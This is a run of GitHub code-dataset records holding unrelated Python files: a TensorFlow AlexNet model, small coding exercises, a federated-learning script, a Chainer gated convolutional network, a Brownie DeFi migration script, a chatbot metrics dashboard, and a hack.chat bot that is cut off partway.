ALEX_FILTER_DEPTH_3], initializer=tf.keras.initializers.he_normal())\n self.b4 = tf.get_variable(name=\"b4\", shape=[ALEX_FILTER_DEPTH_3], initializer=tf.ones_initializer())\n \n self.w5 = tf.get_variable(name=\"w5\", shape=[ALEX_FILTER_SIZE_4, ALEX_FILTER_SIZE_4, ALEX_FILTER_DEPTH_3, ALEX_FILTER_DEPTH_3], initializer=tf.keras.initializers.he_normal())\n self.b5 = tf.get_variable(name=\"b5\", shape=[ALEX_FILTER_DEPTH_3], initializer=tf.initializers.zeros())\n \n self.pool_reductions = 3\n self.conv_reductions = 2\n self.no_reductions = self.pool_reductions + self.conv_reductions\n self.w6 = tf.get_variable(name=\"w6\", shape=[(self.image_width // 2**self.no_reductions)*(self.image_height // 2**self.no_reductions)*ALEX_FILTER_DEPTH_3, ALEX_NUM_HIDDEN_1], initializer=tf.keras.initializers.he_normal())\n self.b6 = tf.get_variable(name=\"b6\", shape=[ALEX_NUM_HIDDEN_1], initializer=tf.ones_initializer())\n\n self.w7 = tf.get_variable(name=\"w7\", shape=[ALEX_NUM_HIDDEN_1, ALEX_NUM_HIDDEN_2], initializer=tf.keras.initializers.he_normal())\n self.b7 = tf.get_variable(name=\"b7\", shape=[ALEX_NUM_HIDDEN_2], initializer=tf.ones_initializer())\n \n self.w8 = tf.get_variable(name=\"w8\", shape=[ALEX_NUM_HIDDEN_2, self.num_labels], initializer=tf.keras.initializers.he_normal())\n self.b8 = tf.get_variable(name=\"b8\", shape=[num_labels], initializer=tf.ones_initializer())\n\n # LAYERS ====================================================================================\n # Placeholders\n self.tf_data = tf.placeholder(tf.float32, shape=(None, self.image_width, self.image_height, self.image_depth))\n self.tf_labels = tf.placeholder(tf.float32, shape = (None, self.num_labels))\n\n # Layer 1\n self.layer1_conv = tf.nn.conv2d(self.tf_data, self.w1, [1, 4, 4, 1], padding='SAME')\n self.layer1_relu = tf.nn.relu(self.layer1_conv + self.b1)\n self.layer1_mean, self.layer1_var = tf.nn.moments(self.layer1_relu, [0,1,2])\n self.layer1_bn = tf.nn.batch_normalization(x=self.layer1_relu, mean=self.layer1_mean, variance=self.layer1_var, offset=None, scale=None, variance_epsilon=EPSILON)\n self.layer1_pool = tf.nn.max_pool(self.layer1_bn, [1, 3, 3, 1], [1, 2, 2, 1], padding='SAME')\n \n # Layer 2\n self.layer2_conv = tf.nn.conv2d(self.layer1_pool, self.w2, [1, 1, 1, 1], padding='SAME')\n self.layer2_relu = tf.nn.relu(self.layer2_conv + self.b2)\n self.layer2_mean, self.layer2_var = tf.nn.moments(self.layer2_relu, [0,1,2])\n self.layer2_bn = tf.nn.batch_normalization(x=self.layer2_relu, mean=self.layer2_mean, variance=self.layer2_var, offset=None, scale=None, variance_epsilon=EPSILON)\n self.layer2_pool = tf.nn.max_pool(self.layer2_bn, [1, 3, 3, 1], [1, 2, 2, 1], padding='SAME')\n \n # Layer 3\n self.layer3_conv = tf.nn.conv2d(self.layer2_pool, self.w3, [1, 1, 1, 1], padding='SAME')\n self.layer3_relu = tf.nn.relu(self.layer3_conv + self.b3)\n self.layer3_mean, self.layer3_var = tf.nn.moments(self.layer3_relu, [0,1,2])\n self.layer3_bn = tf.nn.batch_normalization(x=self.layer3_relu, mean=self.layer3_mean, variance=self.layer3_var, offset=None, scale=None, variance_epsilon=EPSILON)\n \n # Layer 4\n self.layer4_conv = tf.nn.conv2d(self.layer3_bn, self.w4, [1, 1, 1, 1], padding='SAME')\n self.layer4_relu = tf.nn.relu(self.layer4_conv + self.b4)\n self.layer4_mean, self.layer4_var = tf.nn.moments(self.layer4_relu, [0,1,2])\n self.layer4_bn = tf.nn.batch_normalization(x=self.layer4_relu, mean=self.layer4_mean, variance=self.layer4_var, offset=None, scale=None, variance_epsilon=EPSILON)\n \n # Layer 5\n self.layer5_conv = tf.nn.conv2d(self.layer4_bn, self.w5, [1, 1, 1, 1], padding='SAME')\n self.layer5_relu = tf.nn.relu(self.layer5_conv + self.b5)\n self.layer5_mean, self.layer5_var = tf.nn.moments(self.layer5_relu, [0,1,2])\n self.layer5_bn = tf.nn.batch_normalization(x=self.layer5_relu, mean=self.layer5_mean, variance=self.layer5_var, offset=None, scale=None, variance_epsilon=EPSILON)\n self.layer5_pool = tf.nn.max_pool(self.layer5_bn, [1, 3, 3, 1], [1, 2, 2, 1], padding='SAME')\n \n # FULLY CONNECTED LAYERS (FF)\n # Layer 6\n self.flat_layer = tf.contrib.layers.flatten(self.layer5_pool)\n self.layer6_fccd = tf.matmul(self.flat_layer, self.w6) + self.b6\n self.layer6_relu = tf.nn.relu(self.layer6_fccd)\n self.layer6_mean, self.layer6_var = tf.nn.moments(self.layer6_relu, [0])\n self.layer6_bn = tf.nn.batch_normalization(x=self.layer6_relu, mean=self.layer6_mean, variance=self.layer6_var, offset=None, scale=None, variance_epsilon=EPSILON)\n self.layer6_drop = tf.layers.dropout(inputs=self.layer6_bn, rate=0.5, training=self.phase)\n\n # Layer 7 w7\n self.layer7_fccd = tf.matmul(self.layer6_drop, self.w7) + self.b6\n self.layer7_relu = tf.nn.relu(self.layer7_fccd)\n self.layer7_mean, self.layer7_var = tf.nn.moments(self.layer7_relu, [0])\n self.layer7_bn = tf.nn.batch_normalization(x=self.layer7_relu, mean=self.layer7_mean, variance=self.layer7_var, offset=None, scale=None, variance_epsilon=EPSILON)\n \n # Layer 8\n self.logits = tf.matmul(self.layer7_bn, self.w8) + self.b8\n\n # Prob\n self.prediction_op = tf.nn.softmax(self.logits)\n self.argmax = tf.argmax(self.prediction_op, 1)\n\n # Loss\n self.loss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=self.logits, labels=self.tf_labels))\n\n # self.optimizer_op = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize(self.loss_op)\n self.optimizer_op = tf.train.GradientDescentOptimizer(self.learning_rate).minimize(self.loss_op)\n\n def get_flattened_op(self):\n return self.flat_layer\n\n def get_inference_op(self):\n return self.logits\n\n def get_prediction_op(self):\n return self.prediction_op\n\n def get_loss_op(self):\n return self.loss_op\n\n\n def get_optimizer_op(self):\n return self.optimizer_op\n\n\n def get_variables(self):\n return {'w1': self.w1, 'w2': self.w2, 'w3': self.w3, 'w4': self.w4, \\\n 'w5': self.w5, 'w6': self.w6, 'w7': self.w7, 'w8': self.w8, \\\n 'b1': self.b1, 'b2': self.b2, 'b3': self.b3, 'b4': self.b4, \\\n 'b5': self.b5, 'b6': self.b6, 'b7': self.b7, 'b8': self.b8 }\n\n\n def get_saver(self):\n return tf.train.Saver({'w1': self.w1, 'w2': self.w2, 'w3': self.w3, 'w4': self.w4, \\\n 'w5': self.w5, 'w6': self.w6, 'w7': self.w7, 'w8': self.w8, \\\n 'b1': self.b1, 'b2': self.b2, 'b3': self.b3, 'b4': self.b4, \\\n 'b5': self.b5, 'b6': self.b6, 'b7': self.b7, 'b8': self.b8 })\n\n","repo_name":"davidlwr/Image_Classification","sub_path":"Alexnet/alexnet_bn_after_relu.py","file_name":"alexnet_bn_after_relu.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73678259750","text":"\"\"\"\nProblem:\n\n \nProfessor Odd has developed a very odd system of rounding numbers.\n \n \nLike normal rounding, when rounding to the nearest 10 or 100, he looks at\n \nthe next digit. However, in odd_rounding, if it is zero or odd, he'll round\n \ndown. If it is bigger than zero and even he'll round up.\n\n \nExample:\n\n \n573 rounded to the nearest 10 is 570, because 3 is odd.\n \n429 rounded to the nearest 100 is 500, because 2 is even.\n \n390 rounded to the nearest 10 is 390, because it ends in 0.\n\n \nThe function odd_rounding takes two numbers: the number to be rounded,\n \nand what we want to round to. \n \nWe will only round to 10 or 100 for the purposes of this problem, but try\n \nand find a general solution for any power of 10.\n\nTests:\n\n \n>>> odd_rounding(573, 10)\n570\n \n>>> odd_rounding(572, 10)\n570\n \n>>> odd_rounding(573, 100)\n500\n \n>>> odd_rounding(429, 100)\n500\n \n>>> odd_rounding(790, 10)\n790\n\"\"\"\nimport doctest, math\ndef run_tests():\n doctest.testmod(verbose=True)\n\ndef odd_rounding(num, tens):\n # Number to check\n num_to_check = int(str(num // tens)[-1])\n result = None\n if num_to_check == 0 or num_to_check % 2 == 1:\n # Replace trailing digits with 0\n result = (num // (tens)) * (tens)\n else:\n # Increment number and then add trailing 0s\n result = (num // (tens) + 1) * (tens)\n\n print(result)\n\nif __name__ == \"__main__\":\n run_tests()\n","repo_name":"LukeBriggsDev/GCSE-Code-Tasks","sub_path":"p02.1x/odd_rounding.py","file_name":"odd_rounding.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"19488941702","text":"'''\n → Combinations\n → Order does not matter\n → Does not repeat single values\n'''\n\n# import\nfrom itertools import combinations\n\n# declare\npeople = ['Raul', 'André', 'John', 'Lucas']\n\nfor group in combinations(people, 2):\n print(group)","repo_name":"rauldosS/utilities_python","sub_path":"02_python/04_functions/itertools/02_combinations.py","file_name":"02_combinations.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"71665918629","text":"import numpy as np\nfrom fedbiomed.common.training_plans import FedSGDRegressor\nfrom fedbiomed.common.data import DataManager\nfrom fedbiomed.researcher.experiment import Experiment\nfrom fedbiomed.researcher.aggregators.fedavg import FedAverage\n\nmodel_args = {\n 'eta0':5e-3,\n 'n_features': 4,\n 'penalty': None,\n 'random_state': 12342,\n 'feature_cols': ['PM25', 'dummy_male', 'age', 'cbmi'],\n 'target_cols': ['blood_pre'],\n 'X_fed_mean': [ 1.1655, 0.52336, 4.2187, 16.213],\n 'X_fed_std': [0.037987, 0.49945 , 0.15293, 1.6210],\n}\n\ntraining_args = {\n 'num_updates': 500,\n 'batch_size': 5,\n 'log_interval': 100\n}\n\ntags = ['eucaim_demo_ml_2']\nnum_rounds = 20\n\nclass SGDRegressorTrainingPlan(FedSGDRegressor):\n def training_data(self, batch_size):\n dataset = pd.read_csv(self.dataset_path)\n\n # create dummy male variable\n dataset['dummy_male'] = (dataset['sex'] == 'male').astype(int)\n\n # select feature columns\n dataset = dataset[self.model_args()['feature_cols'] + self.model_args()['target_cols']]\n\n # drop NaN values\n dataset = dataset.dropna(axis=0)\n \n # convert to numpy array\n X = dataset[self.model_args()['feature_cols']].values\n y = dataset[self.model_args()['target_cols']].values\n\n # normalize feature values\n X = (X - np.array(self.model_args()['X_fed_mean']))/np.array(self.model_args()['X_fed_std'])\n \n return DataManager(dataset=X, \n target=y, \n batch_size=batch_size, \n shuffle=True)\n\n\n# Define the training experiment\nexp = Experiment(tags=tags,\n model_args=model_args,\n training_plan_class=SGDRegressorTrainingPlan,\n training_args=training_args,\n round_limit=num_rounds,\n aggregator=FedAverage(),\n node_selection_strategy=None,\n skip_data_quality_check=True)\n\n# Run the training\nexp.run()\n\n# Extract regression parameters\nparams = exp.aggregated_params()[num_rounds-1]['params']\n\n# Scale back to unnormalized values\nintercept = params['intercept_'] - np.dot(np.array(model_args['X_fed_mean']), params['coef_']/np.array(model_args['X_fed_std']))\ncoef = np.array(params['coef_'])/np.array(model_args['X_fed_std'])\n\nprint(f'Intercept: {intercept}')\nfor feature_col_name, coef in zip(model_args['feature_cols'], coef):\n print(f'{feature_col_name}: {coef}')\n","repo_name":"sharkovsky/EUCAIM_Fedbiomed_demo","sub_path":"demo_ml/federated_training.py","file_name":"federated_training.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"40627190170","text":"import numpy as np\nimport sobamchan_chainer\nimport chainer.links as L\nimport chainer.functions as F\nfrom chainer import Variable\nimport chainer\n\nclass GLU_conv(sobamchan_chainer.Model):\n\n def __init__(self, in_channels, out_channels, ksize):\n super(GLU_conv, self).__init__(\n conv=L.Convolution2D(in_channels, out_channels, (1, ksize)),\n )\n self.padding = int(ksize/2)\n\n @staticmethod\n def zero_padding(x, padding_size, axis=3):\n size = list(x.shape)\n size[axis] = padding_size\n zeros = Variable(np.zeros(size, dtype=np.float32))\n x = F.concat([zeros, x], axis)\n return x\n\n def __call__(self, x):\n x = self.zero_padding(x, self.padding)\n return self.conv(x)\n\n\nclass Gated_Unit(sobamchan_chainer.Model):\n\n def __init__(self, in_channels, out_channels, ksize):\n super(Gated_Unit, self).__init__(\n conv=GLU_conv(in_channels, out_channels, ksize),\n conv_g=GLU_conv(in_channels, out_channels, ksize)\n )\n\n def __call__(self, x):\n A = self.conv(x)\n B = F.sigmoid(self.conv_g(x))\n h = A * B\n batch, channel, height, width = h.shape\n return h\n\nclass ResBlock(sobamchan_chainer.Model):\n\n def __init__(self, block_n, in_channels, out_channels, ksize):\n super(ResBlock, self).__init__()\n modules = []\n for i in range(block_n):\n modules += [('gated_unit_{}'.format(i), Gated_Unit(in_channels, out_channels, ksize))]\n in_channels = out_channels\n [self.add_link(*link) for link in modules]\n self.modules = modules\n self.block_n = block_n\n \n def __call__(self, x, train=False):\n h = x\n for i in range(self.block_n):\n h = self['gated_unit_{}'.format(i)](h)\n channel_diff = h.shape[1] - x.shape[1]\n x = GLU_conv.zero_padding(x, channel_diff, 1)\n length_diff = x.shape[3] - h.shape[3]\n h = GLU_conv.zero_padding(h, length_diff, 3)\n return x + h\n\n\nclass Gated_Conv_Net(sobamchan_chainer.Model):\n\n def __init__(self, resblock_n, in_channels, out_channels, ksize, category_n):\n super(Gated_Conv_Net, self).__init__()\n modules = []\n for i in range(resblock_n):\n modules += [('resblock_{}'.format(i), ResBlock(3, in_channels, out_channels, ksize))]\n in_channels = out_channels\n modules += [('fc', L.Linear(None, category_n))]\n [ self.add_link(*link) for link in modules ]\n self.modules = modules\n self.resblock_n = resblock_n\n self.category_n = category_n\n\n def __call__(self, x, train=True):\n for i in range(self.resblock_n):\n x = self['resblock_{}'.format(i)](x, train)\n x = self['fc'](x)\n return x\n # batch = x.shape[0]\n # return F.reshape(x, (batch, self.category_n, -1))\n\n def cal_loss(self, y, t):\n return F.softmax_cross_entropy(y, t)\n\n def cal_acc(self, y, t):\n return F.accuracy(y, t)\n","repo_name":"sobamchan/language_modeling_with_gated_convolutional_networks","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"11643623771","text":"import sys\n\nN = int(sys.stdin.readline())\n\nwords = []\n\nfor _ in range(N):\n\twords.append(sys.stdin.readline().strip())\n\n# 단어의 길이순으로 words 정렬\nwords.sort(key=len)\n\nresult = 0\n\nfor n in range(N):\n prefixFlag=False\n for i in range(n+1,N):\n if words[i].find(words[n])==0 : #접두사\n prefixFlag=True\n break\n if not prefixFlag :\n result += 1\n\nprint(result)","repo_name":"YuSuhwa-ve/BOJ","sub_path":"1141.py","file_name":"1141.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"5033231404","text":"from brownie import accounts, interface, Contract, nwToken, nProxy, MigrateCTokens\nfrom brownie.network import Chain\nchain = Chain()\n\nclass cTokenMigrationEnvironment:\n def __init__(self, deployer) -> None:\n self.deployer = deployer\n self.whales = {}\n self.whales[\"ETH\"] = accounts.at(\"0x1b3cb81e51011b549d78bf720b0d924ac763a7c2\", force=True)\n self.whales[\"DAI\"] = accounts.at(\"0x604981db0C06Ea1b37495265EDa4619c8Eb95A3D\", force=True)\n self.whales[\"USDC\"] = accounts.at(\"0x0a59649758aa4d66e25f08dd01271e891fe52199\", force=True)\n self.whales[\"WBTC\"] = accounts.at(\"0x6dab3bcbfb336b29d06b9c793aef7eaa57888922\", force=True)\n self.notional = interface.NotionalProxy(\"0x1344A36A1B56144C3Bc62E7757377D288fDE0369\")\n\n def deployNCTokens(self):\n # self.ncETH = self.deployNCToken(\n # \"0x4Ddc2D193948926D02f9B1fE9e1daa0718270ED5\",\n # True\n # )\n \n # self.deployNCToken(\n # \"0x5d3a536E4D6DbD6114cc1Ead35777bAB948E3643\",\n # False\n # )\n\n # self.ncUSDC = self.ncUSDC = self.deployNCToken(\n # \"0x39AA39c021dfbaE8faC545936693aC917d5E7563\",\n # False\n # )\n # self.ncWBTC = self.deployNCToken(\n # \"0xccF4429DB6322D5C611ee964527D42E5d685DD6a\",\n # False\n # )\n self.ncTokens = {}\n self.ncTokens[1] = Contract.from_abi('nwETH', \"0xaaC5145f5286a3C6a06256fdfBf5b499aA965C9C\", nwToken.abi)\n self.ncTokens[2] = Contract.from_abi('nwDAI', \"0xDBBB034A50C436359fb6D87D3D669647E0FA24D5\", nwToken.abi)\n self.ncTokens[3] = Contract.from_abi('nwUSDC', \"0xc91864Be1b097c9c85565cDB013Ba2307FFB492a\", nwToken.abi)\n self.ncTokens[4] = Contract.from_abi('nwWBTC', \"0x0F12B85A331aCb515e1626F707aadE62E9960187\", nwToken.abi)\n\n def migrateAll(self, migrateFromPaused=True):\n chain.snapshot()\n # patch = MigrateCTokens.deploy(\n # \"0xC2c594f0bb455637a93345A17f841DAC750ccF54\", # Current Implementation\n # \"0x5030D70175e27e46216Ee48972bC8E2db12bBA6D\", # Paused Router\n # self.notional,\n # self.ncTokens[1],\n # self.ncTokens[2],\n # self.ncTokens[3],\n # self.ncTokens[4],\n # {\"from\": self.deployer}\n # )\n patch = MigrateCTokens.at(\"0x02551ded3F5B25f60Ea67f258D907eD051E042b2\")\n self.notional.transferOwnership(patch, False, {\"from\": self.notional.owner()})\n patch.atomicPatchAndUpgrade({\"from\": self.notional.owner()})\n\n if migrateFromPaused:\n self.notional.upgradeTo(\"0x0158fC072Ff5DDE8F7b9E2D00e8782093db888Db\", {\"from\": self.notional.owner()})\n\n def deployNCToken(self, cToken, isETH):\n impl = nwToken.deploy(self.notional.address, cToken, isETH, {\"from\": self.deployer})\n proxy = nProxy.deploy(impl, bytes(), {\"from\": self.deployer})\n return Contract.from_abi(\"nwToken\", proxy.address, nwToken.abi)\n\n\ndef main():\n deployer = accounts.at(\"0xE6FB62c2218fd9e3c948f0549A2959B509a293C8\", force=True)\n env = cTokenMigrationEnvironment(deployer)\n env.deployNCTokens()\n env.migrate(1)\n env.migrate(2)\n env.migrate(3)\n env.migrate(4)\n","repo_name":"notional-finance/contracts-v2","sub_path":"scripts/CTokenMigrationEnvironment.py","file_name":"CTokenMigrationEnvironment.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"71"}
+{"seq_id":"28227624407","text":"import altair as alt\nimport ast \nimport datetime\nimport pandas as pd\nimport pytz\nimport psycopg2\nimport json\nimport mysql.connector\nalt.renderers.enable('json')\nclass Database():\n def __init__(self):\n db = ConfigParser()\n db.read(\"/app/actions/config_data.ini\")\n db_creds = db['database']\n self.host = db_creds['host']\n self.database = db_creds['database']\n self.user = db_creds['user']\n self.password = db_creds['password']\n \n def engine(self):\n connection = None\n try:\n connection = psycopg2.connect(host=self.host,\n database=self.database,\n user=self.user,\n password=self.password)\n \n except Error as error:\n print(\"Failed to connect: {}\".format(error))\n \n finally:\n return connection \n\n def query(self, mySql_select_query):\n engine = self.engine()\n cursor = engine.cursor()\n cursor.execute(mySql_select_query)\n results = cursor.fetchall()\n return results \n\nclass Metrics():\n def __init__(self):\n self.eng = Database()\n\n def returned_users_data(self):\n SQL = \"SELECT timestamp,(COUNT(sender_id)-1) FROM public.events WHERE type_name = 'session_started' GROUP BY timestamp;\"\n results = self.eng.query(SQL)\n dates=[[result[1],datetime.datetime.fromtimestamp(result[0],tz=pytz.timezone('Asia/Kolkata')).strftime('%Y-%m-%dT%H:%M:%S')] for result in results]\n df = pd.DataFrame(dates, columns = ['Count','dates'])\n return df\n def returned_users_chart(self):\n df = self.returned_users_data()\n brush = alt.selection(type='interval', encodings=['x'])\n bars = alt.Chart().mark_bar().encode(\n x='monthdate(dates):O',\n y=alt.Y('Count:Q',scale=alt.Scale(domain=[0,2])),\n opacity=alt.condition(brush, alt.OpacityValue(1), alt.OpacityValue(0.7)),\n ).add_selection(\n brush\n )\n\n line = alt.Chart().mark_rule(color='firebrick').encode(\n y='mean(Count):Q',\n size=alt.SizeValue(3)\n ).transform_filter(\n brush\n )\n\n returned_users = alt.layer(bars, line, data=df).properties(height=300, width=500)\n\n return returned_users\n\n def users_and_queries_data(self):\n SQL = \"SELECT sender_id, timestamp FROM public.events WHERE type_name = 'user';\"\n results = self.eng.query(SQL)\n times=[[result[0],datetime.datetime.fromtimestamp(result[1],tz=pytz.timezone('Asia/Kolkata')).strftime('%Y-%m-%dT%H:%M:%S')] for result in results]\n df = pd.DataFrame(times, columns=['sender','Time'])\n df['Queries'] = 1\n return df\n\n def users_and_queries_chart(self):\n df = self.users_and_queries_data()\n brush = alt.selection(type='interval', encodings=['y'])\n color = alt.condition(brush, alt.Color('count(Queries):Q'),alt.value('gray'))\n heat = alt.Chart(df).mark_rect().encode(\n x= alt.X(\"hours(Time):O\",title='Time'), \n y=alt.Y(\"monthdate(Time):O\",title='Number of queries'),\n color= color,\n tooltip=alt.Tooltip(['sum(Queries):Q',\"hours(Time):O\"])).properties(\n height=350,width=700).add_selection(\n brush)\n line=alt.Chart(df).mark_bar().encode(\n x = alt.X('sender:N'),\n y = alt.Y('count():Q', scale=alt.Scale(domain=[0,10]))).transform_filter(\n brush).properties(\n height=200,width=675)\n\n\n rule = alt.Chart(df).transform_joinaggregate(group_count='count(*)', groupby=['sender'] ).mark_rule(color='red').encode(\n y=alt.Y('mean(group_count):Q')).transform_filter(\n brush)\n red = alt.Chart(df).transform_joinaggregate(\n group_count='count(*)', groupby=['sender'] ).mark_rule(\n color='red').encode(\n y ='mean(group_count):Q').transform_filter(\n brush)\n heatmap = alt.vconcat(heat, line+rule+red)\n\n return heatmap\n\n def unique_users_data(self):\n SQL = \"SELECT DISTINCT sender_id, MIN(timestamp) FROM public.events WHERE type_name = 'session_started' GROUP BY sender_id;\"\n results = self.eng.query(SQL)\n times=[[result[0],datetime.datetime.fromtimestamp(result[1],tz=pytz.timezone('UTC')).strftime('%Y-%m-%dT%H:%M:%S')] for result in results]\n unique = pd.DataFrame(times, columns=['sender','time'])\n\n return unique\n def unique_users_chart(self):\n unique = self.unique_users_data()\n unique = alt.Chart(unique).mark_line().encode(\n x='monthdate(time):O',\n y='count():Q').properties(height=300, width=500)\n\n return unique\n def save_charts(self, chart, name):\n chart.save(name)\n \n def pipeline(self):\n metrics = [self.unique_users_chart, self.returned_users_chart, self.users_and_queries_chart]\n names = ['chart_u', 'chart_r', 'chart_q']\n charts = {}\n for metric, name in zip(metrics, names):\n chart = metric()\n charts[name] = chart.to_json()\n \n \n return dict(charts)\n","repo_name":"thundersparkf/django_webserver","sub_path":"dashboard/metrics/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":5403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"37596872889","text":"#!/usr/bin/env python3\n\n\"\"\"Connects the bot.\"\"\"\n\nimport os\nimport os.path\nimport random\nimport re\nimport sys\nimport threading\nimport time\n\nimport hclib\nimport pymongo\n\nfrom commands import currency\nfrom commands import dictionary\nfrom commands import jokes\nfrom commands import katex\nfrom commands import password\nfrom commands import paste\nfrom commands import poetry\nfrom commands import search\nimport utility\n\n\nclass HackChatBot:\n \"\"\"Runs the bot.\"\"\"\n _charsPerLine = 88\n _maxLines = 8\n # Messages with more than <_maxChars> characters cause ratelimits.\n _maxChars = _charsPerLine * _maxLines\n _trigger = os.environ.get(\"TRIGGER\")\n _nick = os.environ.get(\"NICK\")\n _url = os.environ.get(\"URL\")\n\n def __init__(self):\n \"\"\"Initializes values.\"\"\"\n # Use instead of as the\n # former makes sure it isn't an empty value.\n if (not os.environ.get(\"CHANNELS\") or not os.environ.get(\"NICK\")\n or not os.environ.get(\"TRIGGER\") or not os.environ.get(\"URL\")):\n sys.exit(\"Please create the \\\"CHANNELS\\\", \\\"NICK\\\", \\\"TRIGGER\\\" \"\n \"and \\\"URL\\\" environment variables.\")\n # The features and their respective functions.\n self._commands = {\n \"afk\": self._away,\n \"alias\": self._alias,\n \"define\": self._define,\n \"h\": self._help,\n \"help\": self._help,\n \"join\": self._join,\n \"joke\": self._joke,\n \"katex\": self._generate_katex,\n \"leave\": self._leave,\n \"msg\": self._message,\n \"password\": self._strengthen,\n \"poem\": self._give_poetry,\n \"poet\": self._give_poetry,\n \"rate\": self._convert,\n \"search\": self._search,\n \"stats\": self._request_statistics,\n \"toss\": self._toss,\n \"translate\": self._translate,\n \"uptime\": self._check_uptime,\n \"urban\": self._urban_define\n }\n self._startTime = time.time()\n uri = os.environ.get(\"MONGODB_URI\")\n client = pymongo.MongoClient(uri)\n uri = uri[::-1]\n slash = re.search(r\"/\", uri)\n dbName = uri[:slash.start()]\n dbName = dbName[::-1]\n self._db = client[dbName]\n env = lambda x, y: os.environ.get(x) if x in os.environ else y\n self._pwd = env(\"PASSWORD\", \"\")\n self._codeUrl = env(\"CODE_URL\", None)\n oxfordAppId = os.environ.get(\"OXFORD_APP_ID\")\n oxfordAppKey = os.environ.get(\"OXFORD_APP_KEY\")\n if oxfordAppId and oxfordAppKey:\n self._oxford = dictionary.Oxford(oxfordAppId, oxfordAppKey)\n else:\n self._commands.pop(\"define\")\n self._commands.pop(\"translate\")\n exchangeRateApiKey = os.environ.get(\"EXCHANGE_RATE_API_KEY\")\n if exchangeRateApiKey:\n self._exchangeRateApiKey = exchangeRateApiKey\n else:\n self._commands.pop(\"rate\")\n print(\"The bot will wait 30 seconds before joining each new channel \"\n + \"to prevent getting ratelimited.\")\n self._channels = os.environ.get(\"CHANNELS\").split(\", \")\n for channel in self._channels:\n self._joinChannel(channel)\n print(\"The bot joined the channel {}\".format(channel))\n time.sleep(30)\n\n def _joinChannel(self, channel):\n \"\"\"Joins the hack.chat channel ().\"\"\"\n args = (self._handle, self._nick, channel, self._pwd, self._url,)\n threading.Thread(target=hclib.HackChat, args=args).start()\n\n def _handle(self, hackChat, info):\n \"\"\"Callback function for data sent from hack.chat.\n\n (callback parameter) is the connection object.\n (callback parameter) is the data sent.\n \"\"\"\n self._hackChat = hackChat\n self._info = info\n if self._info[\"type\"] == \"invite\":\n self._joinChannel(self._info[\"channel\"])\n elif self._info[\"type\"] == \"message\":\n # Don't check for AFK statuses if the bot itself sent the\n # message. Otherwise if the bot replied to someone stating\n # chat a user is AFK, the bot will reply to its own message\n # as the AFK user was mentioned in that message.\n if self._nick != self._info[\"nick\"]:\n self._check_afk()\n self._post()\n if \"trip\" in self._info:\n self._log_trip_code()\n txt = self._info[\"text\"].strip()\n space = re.search(r\"\\s\", txt)\n self._msg = txt[space.end():].strip() if space else None\n call = txt[:len(self._trigger)]\n if call == self._trigger:\n check = space.start() if space else len(txt)\n self._cmd = txt[len(self._trigger):check]\n # Get the requested feature (e.g., katex:red is katex).\n pattern = re.search(r\"[^a-zA-Z]\", self._cmd)\n area = pattern.start() if pattern else len(txt)\n self._feature = self._cmd[:area]\n if self._feature in self._commands:\n self._commands[self._feature]()\n elif self._info[\"type\"] == \"online add\":\n self._post()\n elif self._info[\"type\"] == \"online remove\":\n field = \"{}.{}\".format(self._hackChat.channel, self._info[\"nick\"])\n self._db[\"afk\"].update_one(\n {\n self._hackChat.channel: {\n \"$exists\": True\n }\n },\n {\n \"$unset\": {\n field: \"\"\n }\n }\n )\n elif self._info[\"type\"] == \"stats\":\n self._hackChat.send(\n \"There are {} unique IPs in \".format(self._info[\"IPs\"])\n + \"{} channels.\".format(self._info[\"channels\"]))\n elif self._info[\"type\"] == \"warn\":\n print(self._info[\"warning\"])\n\n def _check_afk(self):\n \"\"\"Notifies AFK statuses.\n\n Checks incoming messages for users @-mentioning users who are\n AFK. If it finds any, it will notify them of such.\n \"\"\"\n collection = self._db[\"afk\"]\n query = {\n self._hackChat.channel: {\n \"$exists\": True\n }\n }\n doc = collection.find_one(query)\n if not doc:\n return\n field = \"{}.{}\".format(self._hackChat.channel, self._info[\"nick\"])\n collection.update_one(\n query,\n {\n \"$unset\": {\n field: \"\"\n }\n }\n )\n reply = \"\"\n users = doc[self._hackChat.channel]\n for field in users:\n # Keep a space around the name so as to make sure names\n # nested in longer words aren't taken by accident (e.g.,\n # \"bot\" in \"mybot\").\n person = \" @{} \".format(field)\n # Add a space around the message so as to account for\n # 's extra spaces.\n if person in \" {} \".format(self._info[\"text\"].strip()):\n reply += person.strip()\n reason = users[field]\n if reason:\n reply += \": {}\".format(reason)\n reply += \"\\n\"\n if reply:\n self._hackChat.send(\n \"@{} AFK users:\\n{}\".format(self._info[\"nick\"], reply))\n\n def _log_trip_code(self):\n \"\"\"Stores nicknames with their trip codes.\"\"\"\n self._db[\"trip_codes\"].update_one(\n {\n self._info[\"trip\"]: {\n \"$exists\": True\n }\n },\n {\n \"$addToSet\": {\n self._info[\"trip\"]: self._info[\"nick\"]\n }\n },\n upsert=True\n )\n\n def _post(self):\n \"\"\"Sends messages saved for users.\"\"\"\n collection = self._db[\"messages\"]\n field = \"{}.{}\".format(self._hackChat.channel, self._info[\"nick\"])\n query = {\n field: {\n \"$exists\": True\n }\n }\n doc = collection.find_one(query)\n collection.update_one(\n query,\n {\n \"$unset\": {\n field: \"\"\n }\n }\n )\n if doc:\n reply = \"\"\n for msg in doc[self._hackChat.channel][self._info[\"nick\"]]:\n reply += \"@{}: {}\\n\".format(msg[\"sender\"], msg[\"message\"])\n 